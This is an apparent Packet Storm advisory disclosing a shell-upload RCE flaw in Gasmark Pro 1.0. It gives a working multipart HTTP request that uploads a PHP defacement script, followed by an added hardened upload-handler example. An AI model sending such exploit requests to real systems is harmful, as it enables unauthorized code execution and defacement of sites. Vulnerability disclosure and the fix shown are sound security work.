packetstorm | nu11secur1ty | PACKETSTORM:177625
History: Mar 18, 2024 - 12:00 a.m.

Gasmark Pro 1.0 Shell Upload

2024-03-18 00:00:00
nu11secur1ty
packetstormsecurity.com
gasmark pro
shell upload
remote code execution
mayurik
file upload
rce
vulnerability
web security
php
application security

AI Score: 7.4 High

Confidence: Low

## Title: GASMARK PRO-1.0 File Upload RCE
  
## Author: nu11secur1ty  
## Date: 03/17/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload  
## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/  
  
## Description:
Vulnerable input:
```html
<input type="file" class="form-control" id="productImage" name="productImage" style="width:auto;">
```
This application suffers from a shell upload and remote code execution vulnerability: an attacker who has valid credentials can easily destroy the system.

STATUS: HIGH - Vulnerability CRITICAL
  
[+]Exploit:  
```http
POST /gasmark/gasmark/php_action/createclient.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=1afinf22p9snl2nai24g29duuc  
Content-Length: 1063  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/gasmark/gasmark/add_client.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
Connection: close  
  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="currnt_date"  
  
  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="name"  
  
pwned  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="gender"  
  
Female  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="mob_no"  
  
1234  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="reffering"  
  
1234  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="address"  
  
1234  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"  
Content-Type: application/octet-stream  
  
<?php  
// by nu11secur1ty - 2023  
$fh = fopen('test.html', 'a');  
fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');  
fclose($fh);  
  
//unlink('test.html');
?>  
  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB  
Content-Disposition: form-data; name="create"  
  
  
------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--  
  
```  
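The request above succeeds because the `productImage` upload is stored with the client-supplied name and extension. A hardened replacement for that handling, added here as an example and not taken from the Gasmark Pro code (the upload directory path and the function name are assumptions):

```php
<?php
// Added example, not the Gasmark Pro code: a hardened handler for the
// productImage field posted to createclient.php. Assumptions: uploads go to
// a directory outside the web root (served by a separate read-only script),
// and the function name is ours.
declare(strict_types=1);

// extension => MIME type that must be sniffed from the file content
const ALLOWED_TYPES = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                       'png' => 'image/png', 'gif' => 'image/gif'];
const MAX_BYTES = 2 * 1024 * 1024;

// Validates $_FILES['productImage'] and returns the server-chosen basename;
// throws on any rejection so the caller never writes an unchecked file.
function storeProductImage(array $file, string $destDir): string
{
    $code = $file['error'] ?? UPLOAD_ERR_NO_FILE;
    if ($code !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed, code ' . (int) $code);
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('Not an uploaded file or too large');
    }
    // Allowlist the extension: "1nsi1deyou.php" is rejected here; a double
    // extension like x.php.jpg is moot because the stored name is generated below.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('Extension not allowed');
    }
    // Sniff the real content type; the multipart Content-Type header is attacker-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext] || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException("Rejected content type $mime for .$ext");
    }
    // The stored name and extension come from the server, never from the client.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);  // not executable, and the directory is not under the web root
    return $name;
}

// In createclient.php, replace the unchecked move of $_FILES['productImage'] with:
// $stored = storeProductImage($_FILES['productImage'], '/var/app/uploads');
```

Even with these checks, the decisive control is that PHP never executes files from the upload directory; configure the web server to serve it as static content only.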
  
## Reproduce:  
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022
  
## Proof and Exploit:  
https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html
  
## Time spent:  
00:25:00  
  
